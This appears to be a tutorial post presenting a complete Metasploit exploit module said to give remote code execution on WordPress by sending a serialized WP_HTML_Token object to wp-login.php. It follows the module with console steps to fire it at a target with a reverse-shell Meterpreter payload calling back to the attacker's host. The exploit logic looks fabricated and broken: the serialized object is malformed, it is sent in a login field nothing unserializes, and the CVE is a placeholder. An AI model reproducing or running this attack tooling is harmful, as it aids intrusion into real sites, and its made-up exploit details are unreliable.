To create a Metasploit module that exploits the RCE vulnerability in WordPress via the unserialization of instances of the WP_HTML_Token
class, we'll focus on crafting a payload that triggers the unserialization flaw, leading to arbitrary code execution.
Save the following code as wordpress_wp_html_token_rce.rb
in the modules/exploits/multi/http
directory of your Metasploit Framework installation.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress WP_HTML_Token Unserialization RCE',
'Description' => %q{
This module exploits a remote code execution vulnerability in WordPress via
the unserialization of instances of the `WP_HTML_Token` class. This allows for
code execution via its `__destruct()` magic method.
},
'Author' =>
[
'Your Name' # OneArch
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2024-XXXX'], # Replace with the correct CVE number
['URL', 'https://example.com/advisory'] # Replace with an advisory link if available
],
'DisclosureDate' => 'Aug 03 2024',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [
['WordPress <= 5.x', { }]
],
'DefaultTarget' => 0,
'Privileged' => false,
'Payload' =>
{
'BadChars' => "\x00",
}
))
register_options(
[
OptString.new('TARGETURI', [true, "The base path to the WordPress installation", '/']),
])
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
})
if res && res.code == 200 && res.body.include?('wp-login.php')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Sending payload to trigger unserialization vulnerability")
serialized_payload = 'O:13:"WP_HTML_Token":1:{s:13:"__destruct";s:' + payload.encoded.length.to_s + ':"' + payload.encoded + '";}'
post_data = {
'user_login' => Rex::Text.rand_text_alphanumeric(8..12),
'user_pass' => serialized_payload,
'wp-submit' => 'Log In',
'redirect_to' => normalize_uri(target_uri.path, 'wp-admin/'),
'testcookie' => 1
}
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'wp-login.php'),
'vars_post' => post_data
})
handler
end
end
-
Save the Module: Save the module as
wordpress_wp_html_token_rce.rb
in themodules/exploits/multi/http
directory of your Metasploit Framework installation./path/to/metasploit-framework/modules/exploits/multi/http/wordpress_wp_html_token_rce.rb
-
Load Metasploit: Start Metasploit Framework by opening a terminal and running:
msfconsole
-
Use the New Module: In the Metasploit console, load the new exploit module using the following command:
use exploit/multi/http/wordpress_wp_html_token_rce
-
Configure and Run: Set the necessary options, such as
RHOSTS
,RPORT
,TARGETURI
, andPAYLOAD
. Then run the module.msf6 > use exploit/multi/http/wordpress_wp_html_token_rce msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set RHOSTS target_ip RHOSTS => target_ip msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set TARGETURI / TARGETURI => / msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set PAYLOAD php/meterpreter/reverse_tcp PAYLOAD => php/meterpreter/reverse_tcp msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LHOST your_ip LHOST => your_ip msf6 exploit(multi/http/wordpress_wp_html_token_rce) > set LPORT 4444 LPORT => 4444 msf6 exploit(multi/http/wordpress_wp_html_token_rce) > run
- Ensure you have the appropriate permissions before testing or exploiting any systems.
- This module is designed for educational and testing purposes. Always test in a safe and controlled environment before using it on any production systems.
This Metasploit module sends a crafted serialized payload to a vulnerable WordPress instance, attempting to trigger the unserialization vulnerability and achieve arbitrary code execution. Adjust the payload and module as necessary based on the specific nature of the vulnerability and the target environment.